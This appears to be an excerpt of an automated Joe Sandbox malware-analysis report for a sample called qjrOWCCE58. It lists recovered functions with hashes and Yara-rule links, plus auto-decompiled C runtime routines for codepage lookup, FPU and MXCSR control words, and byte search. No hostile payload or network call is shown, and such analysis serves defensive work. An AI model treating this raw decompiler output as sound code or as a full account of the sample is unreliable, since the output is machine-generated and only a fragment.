Uniqueness

Uniqueness Score: -1.00%

Function 00833D3C Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00833EB8

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1476618c8e66f56a198274a85053ba7ae76a271cc52a9967f3c16d55a5b0da1c
Instruction ID: 107c5c8673ccad5595ba2a4e5491925d058bd790dcb5dd20eee6dde893ece03b
Opcode Fuzzy Hash: 1476618c8e66f56a198274a85053ba7ae76a271cc52a9967f3c16d55a5b0da1c
Instruction Fuzzy Hash: 06514B7060474867DF38996D88967BE679AFBC2304F14041EE483DBA92D725EF44C3D6

Uniqueness

Uniqueness Score: -1.00%

Function 00431D94 Relevance: 1.2, Instructions: 1197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9d20907805ac7474ec32fa6c2d7d2894a6ea817fc603c911fe1f7ca567283e
Instruction ID: d8c4cead6973cd640c4678d5344f886e79cb006aa1a1c7d7c7984e4b4914cbdb
Opcode Fuzzy Hash: 0c9d20907805ac7474ec32fa6c2d7d2894a6ea817fc603c911fe1f7ca567283e
Instruction Fuzzy Hash: 21B29A9644E7C11FDB038B742E792407F70AE23114B5E96DFC8D5CE4A7E24C9A0AD72A

Uniqueness

Uniqueness Score: -1.00%

Function 00420B79 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 290e96e00654a2e318d1f1bbb923c212666d2094d60c8a8c2ea8cf7abe5e595c
Instruction ID: d0c522918e034ab84b3006da2ae667bd07a848e819ae39afd784048ab2983721
Opcode Fuzzy Hash: 290e96e00654a2e318d1f1bbb923c212666d2094d60c8a8c2ea8cf7abe5e595c
Instruction Fuzzy Hash: 44322421E29F514DD7238635D832336A289AFB73C4F55D737F819B5EA6EB28C5834108

Uniqueness

Uniqueness Score: -1.00%

Function 00425020 Relevance: .3, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00425020(void* __ebx, void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				char _v36;
				char _v136;
				signed int _v140;
				intOrPtr* _v168;
				signed int _v180;
				char _v272;
				char _v420;
				signed int _v448;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t93;
				signed int _t97;
				void* _t99;
				intOrPtr _t111;
				void* _t113;
				signed int _t115;
				signed int _t119;
				intOrPtr _t127;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				intOrPtr _t146;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t152;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				intOrPtr* _t176;
				signed int _t196;
				intOrPtr* _t198;
				intOrPtr* _t209;
				signed int _t211;
				intOrPtr* _t212;
				signed short* _t217;
				intOrPtr* _t220;
				void* _t221;
				intOrPtr* _t224;
				signed int _t227;
				intOrPtr* _t229;
				intOrPtr* _t231;
				intOrPtr* _t233;
				void* _t235;
				void* _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t243;
				signed int _t244;
				void* _t245;
				void* _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t252;

				_t234 = __edx;
				_t171 = __ebx;
				_t93 =  *0x43b054; // 0x41d6575c
				_v8 = _t93 ^ _t248;
				_t242 = _a4;
				_t245 = E0041B333(__ecx, __edx);
				asm("sbb ecx, ecx");
				_t97 = E0041CFF1(_t242, ( ~( *(_t245 + 0x64)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
				if(_t97 != 0) {
					_push(__ebx);
					_t99 = E004221B2(_t242, _t245,  *((intOrPtr*)(_t245 + 0x54)),  &_v136);
					_t172 = 0;
					_v140 = 0;
					if(_t99 != 0) {
						L15:
						if(( *(_t245 + 0x58) & 0x00000300) == 0x300) {
							L47:
							_t105 =  !( *(_t245 + 0x58) >> 2) & 0x00000001;
							goto L48;
						} else {
							asm("sbb ecx, ecx");
							if(E0041CFF1(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
								if(E004221B2(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136) != 0) {
									goto L47;
								} else {
									_t196 =  *(_t245 + 0x58) | 0x00000200;
									 *(_t245 + 0x58) = _t196;
									if( *(_t245 + 0x60) == _t172) {
										if( *((intOrPtr*)(_t245 + 0x5c)) == _t172) {
											L43:
											_t62 = _t245 + 0x2a0; // 0x2a0
											_t234 = _t62;
											 *(_t245 + 0x58) = _t196 | 0x00000100;
											if( *_t62 != _t172) {
												goto L47;
											} else {
												_t198 = _t242;
												_t173 = _t198 + 2;
												do {
													_t111 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t111 != _v140);
												goto L46;
											}
										} else {
											_t239 =  *((intOrPtr*)(_t245 + 0x50));
											_t175 = _t239 + 2;
											do {
												_t146 =  *_t239;
												_t239 = _t239 + 2;
											} while (_t146 != _v140);
											_t241 = _t239 - _t175 >> 1;
											if(_t239 - _t175 >> 1 !=  *((intOrPtr*)(_t245 + 0x5c))) {
												_t172 = 0;
												goto L43;
											} else {
												if(E004254B5(_t175, _t196, _t241, _t242, _t242) != 0) {
													L38:
													 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000100;
													_t59 = _t245 + 0x2a0; // 0x2a0
													_t234 = _t59;
													if( *_t59 != 0) {
														goto L47;
													} else {
														_t220 = _t242;
														_t173 = _t220 + 2;
														do {
															_t149 =  *_t220;
															_t220 = _t220 + 2;
														} while (_t149 != _v140);
														goto L46;
													}
												} else {
													_t176 =  *((intOrPtr*)(_t245 + 0x50));
													_t234 = 0;
													_t221 = _t176 + 2;
													do {
														_t150 =  *_t176;
														_t176 = _t176 + 2;
													} while (_t150 != 0);
													if(E00424FEC( *((intOrPtr*)(_t245 + 0x50))) == _t176 - _t221 >> 1) {
														goto L47;
													} else {
														goto L38;
													}
												}
											}
										}
									} else {
										_t45 = _t245 + 0x2a0; // 0x2a0
										_t234 = _t45;
										 *(_t245 + 0x58) = _t196 | 0x00000100;
										if( *_t45 != _t172) {
											goto L47;
										} else {
											_t224 = _t242;
											_t173 = _t224 + 2;
											do {
												_t152 =  *_t224;
												_t224 = _t224 + 2;
											} while (_t152 != _v140);
											L46:
											_t200 = _t198 - _t173 >> 1;
											_push((_t198 - _t173 >> 1) + 1);
											_t113 = E004239AD(_t234, 0x55, _t242);
											_t252 = _t251 + 0x10;
											if(_t113 != 0) {
												_t172 = 0;
												goto L51;
											} else {
												goto L47;
											}
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t172;
								goto L18;
							}
						}
					} else {
						asm("sbb eax, eax");
						if(E0041CFF1(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
							_t161 = E004221B2(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136);
							_t227 =  *(_t245 + 0x58);
							if(_t161 != 0) {
								if((_t227 & 0x00000002) != 0) {
									goto L15;
								} else {
									if( *((intOrPtr*)(_t245 + 0x5c)) == 0) {
										L19:
										if(( *(_t245 + 0x58) & 0x00000001) != 0 || E004254B5(_t172, _t227, _t234, _t242, _t242) == 0) {
											goto L15;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000001;
											_t229 = _t242;
											_t234 = _t229 + 2;
											do {
												_t163 =  *_t229;
												_t229 = _t229 + 2;
											} while (_t163 != _t172);
											goto L14;
										}
									} else {
										_t168 = E004160A3(0, _t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136,  *((intOrPtr*)(_t245 + 0x5c)));
										_t251 = _t251 + 0xc;
										if(_t168 != 0) {
											goto L19;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000002;
											_t231 = _t242;
											_t234 = _t231 + 2;
											do {
												_t169 =  *_t231;
												_t231 = _t231 + 2;
											} while (_t169 != 0);
											goto L14;
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t227 | 0x00000304;
								_t233 = _t242;
								_t234 = _t233 + 2;
								do {
									_t170 =  *_t233;
									_t233 = _t233 + 2;
								} while (_t170 != 0);
								L14:
								_t200 = _t229 - _t234 >> 1;
								_push((_t229 - _t234 >> 1) + 1);
								_t29 = _t245 + 0x2a0; // 0x2a0
								_t166 = E004239AD(_t29, 0x55, _t242);
								_t252 = _t251 + 0x10;
								if(_t166 != 0) {
									L51:
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									E00411D34();
									asm("int3");
									_push(_t248);
									_t249 = _t252;
									_t115 =  *0x43b054; // 0x41d6575c
									_v180 = _t115 ^ _t249;
									_push(_t245);
									_push(_t242);
									_t243 = _v168;
									_t246 = E0041B333(_t200, _t234);
									asm("sbb ecx, ecx");
									_t119 = E0041CFF1(_t243, ( ~( *(_t246 + 0x60)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
									if(_t119 != 0) {
										if(E004221B2(_t243, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v272) != 0) {
											L58:
											_t125 =  !( *(_t246 + 0x58) >> 2) & 0x00000001;
											goto L59;
										} else {
											_t209 = _t243;
											_push(_t172);
											_t234 = _t209 + 2;
											do {
												_t127 =  *_t209;
												_t209 = _t209 + 2;
											} while (_t127 != 0);
											_t211 = _t209 - _t234 >> 1;
											_push(_t211 + 1);
											_t79 = _t246 + 0x2a0; // 0x2a0
											if(E004239AD(_t79, 0x55, _t243) != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00411D34();
												asm("int3");
												_push(_t249);
												_push(_t211);
												_push(_t246);
												_t247 = _v448;
												_push(_t243);
												if(_t247 == 0) {
													L87:
													_push(2);
													_push( &_v36);
													_push(0x20001004);
												} else {
													_t244 = 0;
													if( *_t247 == 0) {
														goto L87;
													} else {
														_t212 = L"ACP";
														_t139 = _t247;
														while(1) {
															_t235 =  *_t139;
															if(_t235 !=  *_t212) {
																break;
															}
															if(_t235 == 0) {
																L68:
																_t140 = _t244;
															} else {
																_t238 =  *((intOrPtr*)(_t139 + 2));
																if(_t238 !=  *((intOrPtr*)(_t212 + 2))) {
																	break;
																} else {
																	_t139 = _t139 + 4;
																	_t212 = _t212 + 4;
																	if(_t238 != 0) {
																		continue;
																	} else {
																		goto L68;
																	}
																}
															}
															L70:
															if(_t140 == 0) {
																goto L87;
															} else {
																if(E004221B2(_t244, _t247, _t247, L"utf8") == 0 || E004221B2(_t244, _t247, _t247, L"utf-8") == 0) {
																	L84:
																	return 0xfde9;
																}
																_t217 = L"OCP";
																_t143 = _t247;
																while(1) {
																	_t236 =  *_t143;
																	if(_t236 !=  *_t217) {
																		break;
																	}
																	if(_t236 != 0) {
																		_t237 =  *((intOrPtr*)(_t143 + 2));
																		if(_t237 !=  *((intOrPtr*)(_t217 + 2))) {
																			break;
																		} else {
																			_t143 = _t143 + 4;
																			_t217 = _t217 + 4;
																			if(_t237 != 0) {
																				continue;
																			} else {
																			}
																		}
																	}
																	L80:
																	if(_t244 != 0) {
																		return E0041AFD2(_t217, _t247);
																	}
																	_push(2);
																	_push( &_v36);
																	_push(0x2000000b);
																	goto L82;
																}
																asm("sbb edi, edi");
																_t244 = _t244 | 0x00000001;
																goto L80;
															}
															goto L82;
														}
														asm("sbb eax, eax");
														_t140 = _t139 | 0x00000001;
														goto L70;
													}
												}
												L82:
												_push(_v20 + 0x250);
												if(E0041CFF1() == 0) {
													return 0;
												}
												_t137 = _v36;
												if(_t137 < 3) {
													goto L84;
												}
												return _t137;
											} else {
												 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000004;
												_pop(_t172);
												goto L58;
											}
										}
									} else {
										 *(_t246 + 0x58) =  *(_t246 + 0x58) & _t119;
										_t125 = _t119 + 1;
										L59:
										return E0040D3AF(_t125, _t172, _v32 ^ _t249, _t234, _t243, _t246);
									}
								} else {
									goto L15;
								}
							}
						} else {
							 *(_t245 + 0x58) =  *(_t245 + 0x58) & 0;
							L18:
							_t105 = 1;
							L48:
							_pop(_t171);
							goto L49;
						}
					}
				} else {
					 *(_t245 + 0x58) =  *(_t245 + 0x58) & _t97;
					_t105 = _t97 + 1;
					L49:
					return E0040D3AF(_t105, _t171, _v8 ^ _t248, _t234, _t242, _t245);
				}
			}

0x00425020
0x00425020
0x0042502b
0x00425032
0x00425037
0x0042503f
0x0042504f
0x0042505f
0x00425066
0x00425071
0x0042507c
0x00425081
0x00425083
0x0042508d
0x00425150
0x0042515c
0x004252d7
0x004252df
0x00000000
0x00425162
0x0042516f
0x00425187
0x004251d1
0x00000000
0x004251d7
0x004251da
0x004251e0
0x004251e6
0x0042521c
0x00425297
0x0042529d
0x0042529d
0x004252a3
0x004252a9
0x00000000
0x004252ab
0x004252ab
0x004252ad
0x004252b0
0x004252b0
0x004252b3
0x004252b6
0x00000000
0x004252b0
0x0042521e
0x0042521e
0x00425221
0x00425224
0x00425224
0x00425227
0x0042522a
0x00425235
0x0042523a
0x00425295
0x00000000
0x0042523c
0x00425245
0x0042526b
0x0042526b
0x00425272
0x00425272
0x0042527d
0x00000000
0x0042527f
0x0042527f
0x00425281
0x00425284
0x00425284
0x00425287
0x0042528a
0x00000000
0x00425293
0x00425247
0x00425247
0x0042524a
0x0042524c
0x0042524f
0x0042524f
0x00425252
0x00425255
0x00425269
0x00000000
0x00000000
0x00000000
0x00000000
0x00425269
0x00425245
0x0042523a
0x004251e8
0x004251ee
0x004251ee
0x004251f4
0x004251fa
0x00000000
0x00425200
0x00425200
0x00425202
0x00425205
0x00425205
0x00425208
0x0042520b
0x004252bf
0x004252c1
0x004252c6
0x004252cb
0x004252d0
0x004252d5
0x004252f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004252d5
0x004251fa
0x004251e6
0x00425189
0x00425189
0x00000000
0x00425189
0x00425187
0x00425093
0x004250a1
0x004250b6
0x004250ca
0x004250d1
0x004250d6
0x004250f6
0x00000000
0x004250f8
0x004250fb
0x00425194
0x00425198
0x00000000
0x004251a5
0x004251a5
0x004251a9
0x004251ab
0x004251ae
0x004251ae
0x004251b1
0x004251b4
0x00000000
0x004251b9
0x00425101
0x0042510e
0x00425113
0x00425118
0x00000000
0x0042511a
0x0042511a
0x0042511e
0x00425120
0x00425123
0x00425123
0x00425126
0x00425129
0x00000000
0x00425123
0x00425118
0x004250fb
0x004250d8
0x004250de
0x004250e1
0x004250e3
0x004250e6
0x004250e6
0x004250e9
0x004250ec
0x0042512e
0x00425130
0x00425135
0x00425137
0x00425140
0x00425145
0x0042514a
0x004252f5
0x004252f5
0x004252f6
0x004252f7
0x004252f8
0x004252f9
0x004252fa
0x004252ff
0x00425302
0x00425303
0x0042530b
0x00425312
0x00425315
0x00425316
0x00425317
0x0042531f
0x0042532f
0x0042533f
0x00425346
0x00425361
0x00425399
0x004253a1
0x00000000
0x00425363
0x00425363
0x00425365
0x00425368
0x0042536b
0x0042536b
0x0042536e
0x00425371
0x00425378
0x0042537d
0x0042537f
0x00425392
0x004253b4
0x004253b5
0x004253b6
0x004253b7
0x004253b8
0x004253b9
0x004253be
0x004253c1
0x004253c4
0x004253c5
0x004253c6
0x004253c9
0x004253cc
0x004254a4
0x004254a4
0x004254a9
0x004254aa
0x004253d2
0x004253d2
0x004253d7
0x00000000
0x004253dd
0x004253dd
0x004253e2
0x004253e4
0x004253e4
0x004253ea
0x00000000
0x00000000
0x004253ef
0x00425406
0x00425406
0x004253f1
0x004253f1
0x004253f9
0x00000000
0x004253fb
0x004253fb
0x004253fe
0x00425404
0x00000000
0x00000000
0x00000000
0x00000000
0x00425404
0x004253f9
0x0042540f
0x00425411
0x00000000
0x00425417
0x00425426
0x00425492
0x00000000
0x00425492
0x00425439
0x0042543e
0x00425440
0x00425440
0x00425446
0x00000000
0x00000000
0x0042544b
0x0042544d
0x00425455
0x00000000
0x00425457
0x00425457
0x0042545a
0x00425460
0x00000000
0x00000000
0x00425462
0x00425460
0x00425455
0x00425469
0x0042546b
0x00000000
0x004254a1
0x0042546d
0x00425472
0x00425473
0x00000000
0x00425473
0x00425464
0x00425466
0x00000000
0x00425466
0x00000000
0x00425411
0x0042540a
0x0042540c
0x00000000
0x0042540c
0x004253d7
0x00425478
0x00425480
0x00425488
0x00000000
0x004254b1
0x0042548a
0x00425490
0x00000000
0x00000000
0x0042549a
0x00425394
0x00425394
0x00425398
0x00000000
0x00425398
0x00425392
0x00425348
0x00425348
0x0042534b
0x004253a4
0x004253b1
0x004253b1
0x00000000
0x00000000
0x00000000
0x0042514a
0x004250b8
0x004250b8
0x0042518c
0x0042518e
0x004252e2
0x004252e2
0x00000000
0x004252e2
0x004250b6
0x00425068
0x00425068
0x0042506b
0x004252e3
0x004252f0
0x004252f0

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: dbd0aa28aa14126fd2113b77b7855f9cce259c401750d582a23a3d33481d17db
Instruction ID: 929b066bc27b0c5c8f4baaf7174ff59164a9ad6c6d682bea0e50faa709836c3e
Opcode Fuzzy Hash: dbd0aa28aa14126fd2113b77b7855f9cce259c401750d582a23a3d33481d17db
Instruction Fuzzy Hash: 0BB12C35700B119BDB389B65DC81BB773A8EF54308F94456FE943C6780EABCA985CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00845287 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: dbd0aa28aa14126fd2113b77b7855f9cce259c401750d582a23a3d33481d17db
Instruction ID: b0fd54df9bc2ed4dcf6b6bb7f74a344b024e580eb0152127d95700b3067737be
Opcode Fuzzy Hash: dbd0aa28aa14126fd2113b77b7855f9cce259c401750d582a23a3d33481d17db
Instruction Fuzzy Hash: 00B10975500B098BDB349F28CC92ABFB3E9FF54308F54452DE947C6642EAB4E985CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0042948A Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0042948A(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0x43c54c - 1; // 0x6
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}

0x00429495
0x0042949d
0x004294f5
0x004294f6
0x004294f8
0x00429507
0x0042950a
0x00429510
0x0042955a
0x0042955d
0x0042955f
0x00429567
0x00429569
0x00429576
0x00429578
0x0042957b
0x00000000
0x0042957b
0x00429580

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581450bb6b43861ff9dd45b6661efa92811bae216c94c70196766293a5368a25
Instruction ID: 7184d889f6d552a492bcf0873cc7bf959491a9495b865414cd2c1ae6c673d8bf
Opcode Fuzzy Hash: 581450bb6b43861ff9dd45b6661efa92811bae216c94c70196766293a5368a25
Instruction Fuzzy Hash: 2021B373F204395B7B0CC57E8C522BDB6E1C68C601745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 008496F1 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581450bb6b43861ff9dd45b6661efa92811bae216c94c70196766293a5368a25
Instruction ID: b0460c4c43f5a5386f9e9b5ace23e7e76d7ab571920beceb3bac6cdb740ccbca
Opcode Fuzzy Hash: 581450bb6b43861ff9dd45b6661efa92811bae216c94c70196766293a5368a25
Instruction Fuzzy Hash: C521B373F204394B7B0CC57ECC532BDB6E1C68C601745823AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0042936A Relevance: .1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0042936A(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0x43c54c - 1; // 0x6
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}

0x00429375
0x00429379
0x004293be
0x004293c0
0x004293c6
0x004293cc
0x004293d3
0x004293c8
0x004293c8
0x004293c8
0x00429421

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cfbbd33520d6ee346e1415eb1f7d2bd1ea10d337635655eff5cb3d6b9bd200
Instruction ID: 1bf042b0e2e0b917e5f528390d3184f363e8b4f8168a9b87ca6ca873710a0d64
Opcode Fuzzy Hash: 58cfbbd33520d6ee346e1415eb1f7d2bd1ea10d337635655eff5cb3d6b9bd200
Instruction Fuzzy Hash: F711A723F30C355B675C816D8C1327AA1D2EBD824074F533AD826E72C4E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 008495D1 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cfbbd33520d6ee346e1415eb1f7d2bd1ea10d337635655eff5cb3d6b9bd200
Instruction ID: e150d2515350370f7b2b250202bd61286bed7c4bf9b8b5ea6732f1777698d0a5
Opcode Fuzzy Hash: 58cfbbd33520d6ee346e1415eb1f7d2bd1ea10d337635655eff5cb3d6b9bd200
Instruction Fuzzy Hash: C4118A23F30C395B675C816D8C1727AA5D2EBD825075F533AD826E7284E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 0040F240 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040F240(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x0040f240
0x0040f247
0x0040f29c
0x0040f29c
0x0040f249
0x0040f249
0x0040f24f
0x0040f259
0x0040f271
0x0040f271
0x0040f274
0x0040f288
0x0040f288
0x0040f28b
0x00000000
0x0040f28d
0x0040f28d
0x0040f28d
0x0040f28f
0x0040f294
0x00000000
0x00000000
0x0040f296
0x0040f299
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f299
0x00000000
0x0040f28d
0x0040f276
0x0040f283
0x0040f2a2
0x0040f2a4
0x0040f2b2
0x0040f2bb
0x00000000
0x0040f2bd
0x0040f2c0
0x0040f2c2
0x0040f2ec
0x0040f2c4
0x0040f2c4
0x0040f2c6
0x0040f2e6
0x0040f2c8
0x0040f2cb
0x0040f2cd
0x0040f2e0
0x0040f2cf
0x0040f2d1
0x00000000
0x0040f2d3
0x00000000
0x0040f2d3
0x0040f2d1
0x0040f2cd
0x0040f2c6
0x0040f2c2
0x00000000
0x0040f29d
0x0040f29d
0x0040f29d
0x00000000
0x0040f287
0x0040f25b
0x0040f25b
0x0040f25b
0x0040f25d
0x0040f262
0x00000000
0x00000000
0x0040f264
0x0040f267
0x00000000
0x0040f269
0x0040f26f
